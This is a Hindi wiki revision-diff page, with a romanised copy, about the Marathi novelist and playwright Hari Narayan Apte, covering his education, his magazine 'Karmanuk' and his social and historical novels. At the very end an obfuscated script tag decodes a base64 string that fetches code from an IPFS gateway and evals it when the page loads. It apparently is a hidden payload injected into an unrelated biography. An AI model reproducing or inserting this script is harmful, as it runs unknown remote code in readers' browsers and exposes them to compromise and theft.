Difference between revisions of "हरि नारायण आपटे"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''हरि नारायण आपटे''' (1864 ई., 1919 ई.) मराठी के प्रसिद्ध उपन...' के साथ नया पन्ना बनाया)
 
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
'''हरि नारायण आपटे''' ([[1864]] ई., [[1919]] ई.) मराठी के प्रसिद्ध उपन्यासकार, कवि, नाटककार थे। हरि नारायण आपटे का जन्म खान देश में हुआ। इनकी ऐतिहासिक दृष्टि व्यापक और विशाल थी। गुप्तकाल से मराठों की स्वराज्य स्थापना तक के काल पर इन्होंने कलापूर्ण उपन्यास लिखे।  
+
{{सूचना बक्सा साहित्यकार
==विद्यार्थी जीवन==
+
|चित्र=Hari-Narayan-Apte.jpg
[[पूना]] में पढ़ते समय इनके भावुक हृदय पर निबंधमालाकार चिपलूणकर और उग्र सुधारक आगरकर का अत्यधिक प्रभाव पड़ा। इसी अवस्था में इन्होंने कई [[अंग्रेजी]] कहानियों का मराठी में सरस अनुवाद किया। विद्यार्थी जीवन में ही इन्होंने [[संस्कृत]] के [[नाटक|नाटकों]] का तथा स्कॉट, डिकसन्‌, थैकरे, रेनाल्ड्स इत्यादि के [[उपन्यास|उपन्यासों]] का गहरा अध्ययन किया और लोकमंगल की दृष्टि से उपन्यास रचना की आकांक्षा इनमें अंकुरित हुई।<ref name="aa">{{cite web |url=http://khoj.bharatdiscovery.org/india/%E0%A4%B9%E0%A4%B0%E0%A4%BF_%E0%A4%A8%E0%A4%BE%E0%A4%B0%E0%A4%BE%E0%A4%AF%E0%A4%A3_%E0%A4%86%E0%A4%AA%E0%A4%9F%E0%A5%87 |title=हरि नारायण आपटे |accessmonthday= |accessyear= 2015|last= |first= |authorlink= |format= |publisher=भारतखोज |language=हिन्दी }}</ref>
+
|चित्र का नाम=हरि नारायण आपटे
{{tocright}}
+
|पूरा नाम=हरि नारायण आपटे
==उपन्यास==
+
|अन्य नाम=
सन्‌ 1885 में इनका 'मघली स्थिति' नामक पहला सामाजिक उपन्यास एक [[समाचार पत्र]] में क्रमश: प्रकाशित होने लगा। बी. ए. की परीक्षा में अनुत्तीर्ण होने पर इन्होंने 'करमणूक' नामक पत्रिका का संपादन करना आरंभ किया। यह कार्य ये अट्ठाईस वर्षों तक सफलता से करते रहे। इस पत्रिका में इनके लगभग इक्कीस उपन्यास प्रकाशित हुए जिनमें दस सामाजिक और ग्यारह ऐतिहासिक है। मराठी उपन्यास के [[क्षेत्र]] में क्रांति का संदेश लेकर ये अवर्तीण हुए। इनकी रचनाओं से मराठी उपन्यास साहित्य की सर्वांगीण समृद्धि हुई। इनकी सामाजिक कृतियों में समाज सुधार का प्रबल संदेश है। मुख्य सामाजिक उपन्यासों में [[मछली]] स्थिति', 'गणपतराव', 'पण लक्षांत कोण वेतों', 'मो' और 'यशवंतराव खरे' उत्कृष्ट हैं। ये चरित्र चित्रण करने में सिद्धहस्त थे। इनकी रचनाओं में यथार्थवाद और ध्येयवाद 'आदर्शवाद' का मनोहर संगम है। साथ ही मिल और स्पेंसर के बुद्धिवाद का रोचक विवेचन भी है। इन्होंने मध्यमवर्गीय महिलाओं की समस्याओं का भावपूर्ण एवं कलात्मक चित्रण किया।
+
|जन्म=[[8 मार्च]], [[1864]]
==चरित्र चित्रण==
+
|जन्म भूमि=[[ख़ानदेश]] ([[महाराष्ट्र]])
ऐतिहासिक उपन्यासों में चंद्रगुप्त, उष:काल, गड आला पण सिंह गेला, और वज्राघात आपटे की उत्कृष्ट कृतियाँ है। इनकी ऐतिहासिक दृष्टि व्यापक और विशाल थी। गुप्तकाल से मराठों की स्वराज्य स्थापना तक के काल पर इन्होंने कलापूर्ण उपन्यास लिखे। 'वज्राघात' इनकी अंतिम कृति है जिसमें दक्षिण के विजयानगरम्‌ राज्य के नाश का प्रभावकारी चित्रण है। इसकी भाषा काव्यपूर्ण और सरस है। इनके सामाजिक उपन्यास ऐतिहासिक उपन्यास जैसे सजीव चरित्र चित्रण से ओतप्रोत है। ये सर्त्य, शिर्व, सुंदरम्‌ के अनन्य उपासक थे। इनकी कहानियाँ 'स्फुट गोष्ठी' नामक चार पुस्तकों में संगृहीत हैं। इनमें चरित्र चित्रण तथा घटना चित्रण का मनोहर संगम है। कला तथा सौंदर्य की अभिव्यक्ति करते हुए जनजागरण का उदात्त कार्य करते में ये सफल रहे।          <ref name="aa"/>
+
|मृत्यु=[[3 मार्च]], [[1919]]
 +
|मृत्यु स्थान=
 +
|अभिभावक=
 +
|पालक माता-पिता=
 +
|पति/पत्नी=
 +
|संतान=
 +
|कर्म भूमि=[[भारत]]
 +
|कर्म-क्षेत्र=लेखन
 +
|मुख्य रचनाएँ='मघली स्थिति', 'मछली स्थिति', 'गणपतराव', 'पण लक्षांत कोण वेतों', 'मो' और 'यशवंतराव खरे' आदि।
 +
|विषय=
 +
|भाषा=[[मराठी भाषा|मराठी]]
 +
|विद्यालय=
 +
|शिक्षा=
 +
|पुरस्कार-उपाधि=
 +
|प्रसिद्धि=[[उपन्यासकार]], नाटककार, [[कवि]]
 +
|विशेष योगदान=
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=[[मराठी साहित्य]], [[मराठी भाषा]], [[महाराष्ट्र]], [[ख़ानदेश]]
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=हरि नारायण आपटे की ऐतिहासिक दृष्टि व्यापक और विशाल थी। इनकी सामाजिक कृतियों में समाज सुधार का प्रबल संदेश है। इन्होंने मध्यमवर्गीय महिलाओं की समस्याओं का भावपूर्ण एवं कलात्मक चित्रण किया है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''हरि नारायण आपटे''' ([[अंग्रेज़ी]]: ''Hari Narayan Apte'', जन्म- [[8 मार्च]], [[1864]], [[महाराष्ट्र]]; मृत्यु- [[3 मार्च]], [[1919]]) [[मराठी भाषा]] के प्रसिद्ध [[उपन्यासकार]], [[कवि]] तथा नाटककार थे। इनकी ऐतिहासिक दृष्टि व्यापक और विशाल थी। [[गुप्त काल]] से लेकर [[मराठा|मराठों]] की स्वराज्य स्थापना तक के काल पर इन्होंने कलापूर्ण [[उपन्यास]] लिखे।
 +
==परिचय==
 +
हरि नारायण आपटे का जन्म [[ख़ानदेश]] ([[महाराष्ट्र]]) में हुआ था। [[पूना]] में पढ़ते समय इनके भावुक [[हृदय]] पर निबंधमालाकार चिपलूणकर और उग्र सुधारक आगरकर का अत्यधिक प्रभाव पड़ा। इसी अवस्था में इन्होंने कई [[अंग्रेज़ी]] कहानियों का [[मराठी भाषा|मराठी]] में सरस अनुवाद किया। विद्यार्थी जीवन में ही इन्होंने [[संस्कृत]] के [[नाटक|नाटकों]] का तथा स्कॉट, डिकसन, थैकरे, रेनाल्ड्स इत्यादि के [[उपन्यास|उपन्यासों]] का गहरा अध्ययन किया और लोकमंगल की दृष्टि से उपन्यास रचना की आकांक्षा इनमें अंकुरित हुई।<ref name="aa">{{cite web |url=http://bharatkhoj.org/india/%E0%A4%B9%E0%A4%B0%E0%A4%BF_%E0%A4%A8%E0%A4%BE%E0%A4%B0%E0%A4%BE%E0%A4%AF%E0%A4%A3_%E0%A4%86%E0%A4%AA%E0%A4%9F%E0%A5%87 |title=हरि नारायण आपटे |accessmonthday= |accessyear= 2015|last= |first= |authorlink= |format= |publisher=भारतखोज |language=हिन्दी }}</ref>
 +
==लेखन कार्य==
 +
सन [[1885]] में हरि नारायण आपटे का 'मघली स्थिति' नामक पहला सामाजिक उपन्यास एक [[समाचार पत्र]] में क्रमश: प्रकाशित होने लगा। बी. ए. की परीक्षा में अनुत्तीर्ण होने पर इन्होंने 'करमणूक' नामक [[पत्रिका]] का संपादन करना आरंभ किया। यह कार्य ये अट्ठाईस वर्षों तक सफलता से करते रहे। इस पत्रिका में इनके लगभग इक्कीस [[उपन्यास]] प्रकाशित हुए, जिनमें दस सामाजिक और ग्यारह ऐतिहासिक हैं। मराठी उपन्यास के क्षेत्र में क्रांति का संदेश लेकर ये अवर्तीण हुए। इनकी रचनाओं से मराठी उपन्यास साहित्य की सर्वांगीण समृद्धि हुई।
 +
====सामाजिक कृतियाँ====
 +
हरि नारायण आपटे की सामाजिक कृतियों में समाज सुधार का प्रबल संदेश है। मुख्य सामाजिक उपन्यासों में 'मछली स्थिति', 'गणपतराव', 'पण लक्षांत कोण वेतों', 'मो' और 'यशवंतराव खरे' उत्कृष्ट हैं। ये चरित्र चित्रण करने में सिद्धहस्त थे। इनकी रचनाओं में यथार्थवाद, ध्येयवाद और आदर्शवाद का मनोहर संगम है। साथ ही मिल और स्पेंसर के बुद्धिवाद का रोचक विवेचन भी है। इन्होंने मध्यमवर्गीय महिलाओं की समस्याओं का भावपूर्ण एवं कलात्मक चित्रण किया।<ref name="aa"/>
 +
 
 +
इनके सामाजिक [[उपन्यास]] ऐतिहासिक उपन्यास जैसे सजीव चरित्र चित्रण से ओतप्रोत हैं। ये 'सत्यम् शिवम् सुंदरम्' के अनन्य उपासक थे। इनकी कहानियाँ 'स्फुट गोष्ठी' नामक चार पुस्तकों में संग्रहीत हैं। इनमें चरित्र चित्रण तथा घटना चित्रण का मनोहर संगम है। कला तथा सौंदर्य की अभिव्यक्ति करते हुए जनजागरण का उदात्त कार्य करते में ये सफल रहे।
 +
==ऐतिहासिक उपन्यास==
 +
इनके ऐतिहासिक उपन्यासों में 'चंद्रगुप्त', 'उष:काल', 'गड आला पण सिंह गेला' और 'वज्राघात' उत्कृष्ट कृतियाँ है। इनकी ऐतिहासिक दृष्टि व्यापक और विशाल थी। [[गुप्त काल]] से मराठों की स्वराज्य स्थापना तक के काल पर इन्होंने कलापूर्ण उपन्यास लिखे। 'वज्राघात' हरि नारायण आपटे की अंतिम कृति है, जिसमें [[दक्षिण भारत]] के [[विजयनगर साम्राज्य|विजयानगरम्‌ राज्य]] के नाश का प्रभावकारी चित्रण है। इसकी [[भाषा]] काव्यपूर्ण और सरस है।<ref name="aa"/>
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
Line 13: Line 49:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{साहित्यकार}}
 
{{साहित्यकार}}
[[Category:साहित्यकार]][[Category:लेखक]][[Category:उपन्यासकार]][[Category:कवि]][[Category:हिन्दी विश्वकोश]]
+
[[Category:साहित्यकार]][[Category:नाटककार]][[Category:उपन्यासकार]][[Category:कवि]][[Category:लेखक]][[Category:आधुनिक लेखक]][[Category:जीवनी साहित्य]][[Category:साहित्य कोश]][[Category:चरित कोश]][[Category:हिन्दी विश्वकोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 05:30, 8 March 2018

hari narayan apate
poora nam hari narayan apate
janm 8 march, 1864
janm bhoomi khanadesh (maharashtr)
mrityu 3 march, 1919
karm bhoomi bharat
karm-kshetr lekhan
mukhy rachanaean 'maghali sthiti', 'machhali sthiti', 'ganapatarav', 'pan lakshaant kon vetoan', 'mo' aur 'yashavantarav khare' adi.
bhasha marathi
prasiddhi upanyasakar, natakakar, kavi
nagarikata bharatiy
sanbandhit lekh marathi sahity, marathi bhasha, maharashtr, khanadesh
any janakari hari narayan apate ki aitihasik drishti vyapak aur vishal thi. inaki samajik kritiyoan mean samaj sudhar ka prabal sandesh hai. inhoanne madhyamavargiy mahilaoan ki samasyaoan ka bhavapoorn evan kalatmak chitran kiya hai.
inhean bhi dekhean kavi soochi, sahityakar soochi

hari narayan apate (aangrezi: Hari Narayan Apte, janm- 8 march, 1864, maharashtr; mrityu- 3 march, 1919) marathi bhasha ke prasiddh upanyasakar, kavi tatha natakakar the. inaki aitihasik drishti vyapak aur vishal thi. gupt kal se lekar marathoan ki svarajy sthapana tak ke kal par inhoanne kalapoorn upanyas likhe.

parichay

hari narayan apate ka janm khanadesh (maharashtr) mean hua tha. poona mean padhate samay inake bhavuk hriday par nibandhamalakar chipaloonakar aur ugr sudharak agarakar ka atyadhik prabhav p da. isi avastha mean inhoanne kee aangrezi kahaniyoan ka marathi mean saras anuvad kiya. vidyarthi jivan mean hi inhoanne sanskrit ke natakoan ka tatha sk aaut, dikasan, thaikare, renalds ityadi ke upanyasoan ka gahara adhyayan kiya aur lokamangal ki drishti se upanyas rachana ki akaanksha inamean aankurit huee.[1]

lekhan kary

san 1885 mean hari narayan apate ka 'maghali sthiti' namak pahala samajik upanyas ek samachar patr mean kramash: prakashit hone laga. bi. e. ki pariksha mean anuttirn hone par inhoanne 'karamanook' namak patrika ka sanpadan karana aranbh kiya. yah kary ye atthaees varshoan tak saphalata se karate rahe. is patrika mean inake lagabhag ikkis upanyas prakashit hue, jinamean das samajik aur gyarah aitihasik haian. marathi upanyas ke kshetr mean kraanti ka sandesh lekar ye avartin hue. inaki rachanaoan se marathi upanyas sahity ki sarvaangin samriddhi huee.

samajik kritiyaan

hari narayan apate ki samajik kritiyoan mean samaj sudhar ka prabal sandesh hai. mukhy samajik upanyasoan mean 'machhali sthiti', 'ganapatarav', 'pan lakshaant kon vetoan', 'mo' aur 'yashavantarav khare' utkrisht haian. ye charitr chitran karane mean siddhahast the. inaki rachanaoan mean yatharthavad, dhyeyavad aur adarshavad ka manohar sangam hai. sath hi mil aur speansar ke buddhivad ka rochak vivechan bhi hai. inhoanne madhyamavargiy mahilaoan ki samasyaoan ka bhavapoorn evan kalatmak chitran kiya.[1]

inake samajik upanyas aitihasik upanyas jaise sajiv charitr chitran se otaprot haian. ye 'satyamh shivamh suandaramh' ke anany upasak the. inaki kahaniyaan 'sphut goshthi' namak char pustakoan mean sangrahit haian. inamean charitr chitran tatha ghatana chitran ka manohar sangam hai. kala tatha sauandary ki abhivyakti karate hue janajagaran ka udatt kary karate mean ye saphal rahe.

aitihasik upanyas

inake aitihasik upanyasoan mean 'chandragupt', 'ush:kal', 'gad ala pan sianh gela' aur 'vajraghat' utkrisht kritiyaan hai. inaki aitihasik drishti vyapak aur vishal thi. gupt kal se marathoan ki svarajy sthapana tak ke kal par inhoanne kalapoorn upanyas likhe. 'vajraghat' hari narayan apate ki aantim kriti hai, jisamean dakshin bharat ke vijayanagaramh‌ rajy ke nash ka prabhavakari chitran hai. isaki bhasha kavyapoorn aur saras hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 1.0 1.1 1.2 hari narayan apate (hindi) bharatakhoj.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>